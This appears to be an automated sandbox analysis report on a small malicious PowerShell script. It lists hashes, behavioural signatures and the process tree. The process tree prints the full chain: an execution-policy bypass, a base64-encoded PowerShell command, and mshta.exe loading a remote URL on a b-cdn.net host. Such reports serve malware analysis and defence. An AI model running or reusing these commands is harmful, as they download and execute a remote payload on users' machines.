Analysis
-
max time kernel
16s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
26/08/2024, 01:16
Static task
static1
Behavioral task
behavioral1
Sample
8b24e9e9cedaa214ef125bc43217e83a0b46eb7bf759a2ad7c735d5d75ca95c8.ps1
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
8b24e9e9cedaa214ef125bc43217e83a0b46eb7bf759a2ad7c735d5d75ca95c8.ps1
Resource
win10v2004-20240802-en
General
-
Target
8b24e9e9cedaa214ef125bc43217e83a0b46eb7bf759a2ad7c735d5d75ca95c8.ps1
-
Size
143B
-
MD5
3693d54bc3e0a508eefa28f951cc8e68
-
SHA1
963018c74563181fb8f60baa032ce8cc018cfd0d
-
SHA256
8b24e9e9cedaa214ef125bc43217e83a0b46eb7bf759a2ad7c735d5d75ca95c8
-
SHA512
2528cfdb72a0ba33a34d3ad2bb3632def1d42ff311c6aa723db2e45a5b020a815384b2cc6cfe3eae194916f642dc250b095ec6391f6af4f635b1289d71635f08
Malware Config
Extracted
https://requested-file.b-cdn.net/flare
Signatures
-
pid Process 1744 powershell.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 1744 powershell.exe 1796 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1744 powershell.exe Token: SeDebugPrivilege 1796 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1744 wrote to memory of 1796 1744 powershell.exe 30 PID 1744 wrote to memory of 1796 1744 powershell.exe 30 PID 1744 wrote to memory of 1796 1744 powershell.exe 30 PID 1796 wrote to memory of 2904 1796 powershell.exe 31 PID 1796 wrote to memory of 2904 1796 powershell.exe 31 PID 1796 wrote to memory of 2904 1796 powershell.exe 31
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\8b24e9e9cedaa214ef125bc43217e83a0b46eb7bf759a2ad7c735d5d75ca95c8.ps11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1744 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eC bQBzAGgAdABhACAAIgBoAHQAdABwAHMAOgAvAC8AcgBlAHEAdQBlAHMAdABlAGQALQBmAGkAbABlAC4AYgAtAGMAZABuAC4AbgBlAHQALwBmAGwAYQByAGUAIgA=2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Windows\system32\mshta.exe"C:\Windows\system32\mshta.exe" https://requested-file.b-cdn.net/flare3⤵
- Modifies Internet Explorer settings
PID:2904
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5f5848773204393fd3b5c0034a7a18ef2
SHA1a25f8cae28f957df70ff10971d130f61e58469c1
SHA25680ed47e0bc9af25a24921c6d714b163101fed68d0763825244c5b0ba30d9ed31
SHA512229d2459e9395e8e3e997f5c658dc563ac929a3e429dbb0de38239687085a2c5fdf4143e6fdb0d50f357f44c5ad42e8d3ac16c7104bb5481dfdb26590971c591